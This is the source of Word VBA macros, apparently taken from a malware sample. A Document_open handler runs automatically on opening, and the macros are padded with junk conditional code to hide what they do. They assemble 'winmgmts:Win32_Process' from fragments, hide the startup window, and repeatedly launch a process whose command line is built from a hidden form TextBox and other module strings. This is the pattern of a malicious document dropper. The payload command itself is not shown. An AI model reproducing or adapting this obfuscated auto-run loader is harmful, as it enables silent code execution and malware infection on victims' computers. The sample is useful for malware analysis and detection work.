Attribute VB_Name = "Cdatjrojc"
Attribute VB_Base = "0{EDE0BFFE-11A4-4952-927E-C9BA25CA029C}{61EAF95E-C3E8-4309-A49F-3C3B7A41ABAE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Idfyrnzrwasw"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Yaqhaatozmzl, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Dim Rgrngxod, Xutsffmlk
If Gmzeoeesau > Taxkbxgxnjj Then
         Hcpfqnmxqlurj = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Jlsntfzrivko < Ywctfgbp Then
         Grqcpdssem = 22
End If
If Rvnthlhj < Hxsorydlrtyih Then
         Xcedrkrmwfh = 355
End If
   Dim Xhjxlxttdm, Lxvewoiymykqh
If Diisfawqzx > Uapkelclj Then
         Nqfuyzwsp = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Pkuulxphvhv < Ywngfftbfdv Then
         Gxrdelzh = 22
End If
If Pkaewccwr < Vblpnjlmkgzr Then
         Rpsdkjgorywe = 355
End If
   Dim Bbrrfqsuxaomw, Cjrldpwdw
If Hdhhkngawu > Ndpybhdmzxfd Then
         Tdhexvwtip = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Pagvcmqoein < Wtimkydhauct Then
         Qyuuzlmrdfeus = 22
End If
If Flpqjbbogy < Iogdblpzqk Then
         Fjfqchpfqvv = 355
End If
Seyceifbijvf
End Sub
Attribute VB_Name = "Kfdjrwbcyqqb"
Function Wvtekiwuo()
   Dim Djpnsnggvshi, Jtptvpzzt
If Ddplmhklsj > Cqkeykqugnbm Then
         Zxwvdqoco = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Ujlwwrvwand < Bpcgeqccxi Then
         Pwfweacbodb = 22
End If
If Jvgpnrwmmuoni < Hnxadjhuqzvna Then
         Xoxivvvnkqlad = 355
End If
Hiyunbszga = Idfyrnzrwasw.Yaqhaatozmzl
   Dim Uhkhfduzcl, Ixelvgwyyn
If Mpxarriubezn > Dwzqgviwicni Then
         Wgnhuqvqg = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Kcvjdxqwb < Yhgrkpgu Then
         Oaxvqrsyym = 22
End If
If Jwsnneewm < Whfadffj Then
         Ywcxongyx = 355
End If
Igbyumwja = Hiyunbszga + Cdatjrojc.Ekcjgnzebrm + Cdatjrojc.Rqygurpn + Cdatjrojc.Dbvplhzrv
   Dim Swpjplnyft, Waywgauuw
If Xpysutao > Xphvgbvbkifl Then
         Kryzgoxojur = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Ttffenozlraa < Slawmvkhduahq Then
         Fmeljched = 22
End If
If Fozzxzhqecjxf < Lqlexxsrf Then
         Oowlgwvoqvhdw = 355
End If
Xzffyfbyniwt = Igbyumwja + Cdatjrojc.Kanrsridbcedz + Cdatjrojc.Jeevvsxbi
   Dim Oyiqjcdnq, Lqrbcaboxvsp
If Lkrndcsj > Aasefbdwamlq Then
         Ijfoklviaq = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Mzmbabqaabiw < Rwpvovzfetxdy Then
         Racfnodjymkz = 22
End If
If Gbifotzteb < Gvtewcceiafr Then
         Omqjevoux = 355
End If
Wvtekiwuo = Gjwureegr + Xzffyfbyniwt + Gjwureegr
   Dim Gzrfbajusf, Moqapcbthduh
If Hhlbqfvc > Qpadlxdgjnd Then
         Wbypicdf = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Xsbirozwksz < Cxikanxeahhpz Then
         Mztlgbdkjom = 22
End If
If Rsiamcwszs < Mjwkttrwkjly Then
         Yzmywnwn = 355
End If
End Function
Function Seyceifbijvf()
   Dim Suwtmqmvszzb, Thvpizxfyr
If Uzobrvuzsrefh > Tkecssaju Then
         Peumvemnwm = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Hdgvsbcqict < Upogtqueggqe Then
         Asukumtwymxhh = 22
End If
If Dmlqrapyg < Mmbxqqmfbxnsz Then
         Xrcilicy = 355
End If
Cxhsjntb = j + "win" + "mgmt" + "s:Win32_Process"
   Dim Ipvagyzm, Lysfejsqbcgs
If Tpnixoijfrdju > Ruktstyy Then
         Grtertps = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Qlqppjcsa < Obmjiwzecuqt Then
         Wpeoxoqvkng = 22
End If
If Dirfysgsqgvj < Owmarkytuxe Then
         Etrzcebwvl = 355
End If
Set Rpalnuvsy = CreateObject(Cxhsjntb)
   Dim Sshlukkvk, Jwzzjsiuh
If Hpdlleea > Hmhkxyso Then
         Yxqtjcsh = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Lmpqlrhizgrke < Jsomupfn Then
         Jyjbjlwu = 22
End If
If Vxqzfqkpomo < Szkevlgfzd Then
         Tygpuuqe = 355
End If
Arelcbenb = Cxhsjntb + ("STARTU")
   Dim Fyqcuatlxu, Auvfhqapaugft
If Dpenadfajba > Vevsgsubu Then
         Pkijkslil = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Vsguvuuldhv < Vzozaooinyyp Then
         Prqritejcllxz = 22
End If
If Yytoonlel < Xhhuifayeunqm Then
         Mwcndphapaf = 355
End If
Crbuemvo = Arelcbenb + Idfyrnzrwasw.Yaqhaatozmzl
   Dim Azfgfracq, Kunceqjimwdd
If Cbbzfadegestg > Ojqejvvukvl Then
         Ojxwghdp = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Kypgnjjl < Tynnzodgg Then
         Tfbpxgwm = 22
End If
If Aogffupilbkco < Wkwsexiizqt Then
         Qdnyjgsjght = 355
End If
Set Seyceifbijvf = CreateObject((Crbuemvo))
   Dim Idcodokvjbszq, Qrydnsijavpbc
If Gdmdyvho > Jamdkgwxpuujy Then
         Aubsomhyh = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Mndejcjgdrv < Psemcixfywy Then
         Wakbcfiwt = 22
End If
If Llrzskpeoldv < Vywjoqeddgiv Then
         Qxuwijbrqym = 355
End If
Seyceifbijvf.XSize = False
   Dim Gscfvgakrhel, Kfpdlhtotncp
If Vwnjvvjnhzvrx > Forisfrqwi Then
         Szocfoepvtvqb = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Xpitjrdnylgzq < Razyrntwp Then
         Npmtbgkhuaop = 22
End If
If Olprypnlp < Qdqketsqreob Then
         Aojjfdlnrd = 355
End If
Seyceifbijvf.YSize = False
   Dim Hbhsilpvj, Qiqkqmcyeo
If Lwefpqkps > Qpehrewvxuz Then
         Difvxnpqp = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Wdgaezgqsuaul < Thtulmyxch Then
         Sfixauiloyw = 22
End If
If Ojfmdntrntiwv < Xgesuknkkw Then
         Dswukcvw = 355
End If
Do While Rpalnuvsy.Create(Wvtekiwuo, Nvbgtqdmiqxv, Seyceifbijvf)
Loop
   Dim Yqotschy, Covmiprvmwa
If Mfdencol > Kolskcpap Then
         Qnwnbdpazwc = Sqr(KaDrP + Sqr(fBLH0X8r))
End If
If Bnpxuvvfoik < Xhsxvlhovshrl Then
         Lojicwqwnrguj = 22
End If
If Elpeghhb < Fafvhgivwta Then
         Vbglfgor = 355
End If
End Function


INQUEST-PP=macro
